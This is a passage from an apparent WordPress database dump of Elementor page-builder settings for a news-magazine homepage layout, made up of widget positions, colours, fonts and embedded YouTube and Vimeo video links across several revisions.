-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e8e973\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"vertical_position\":{\"unit\":\"%\",\"size\":15},\"horizontal_position\":{\"unit\":\"%\",\"size\":11},\"width\":\"600\",\"height\":\"250\",\"category_bg_color\":\"#357edd\",\"margin_bottom\":10},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1427,492,'_elementor_version','0.4'),(1428,492,'_elementor_css','a:3:{s:4:\"time\";i:1508921109;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1430,493,'_elementor_edit_mode','builder'),(1431,493,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e8e973\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"vertical_position\":{\"unit\":\"%\",\"size\":15},\"horizontal_position\":{\"unit\":\"%\",\"size\":11},\"width\":\"600\",\"height\":\"296\",\"category_bg_color\":\"#357edd\",\"margin_bottom\":10},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1432,493,'_elementor_version','0.4'),(1433,493,'_elementor_css','a:3:{s:4:\"time\";i:1508921325;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1435,494,'_elementor_edit_mode','builder'),(1436,494,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_b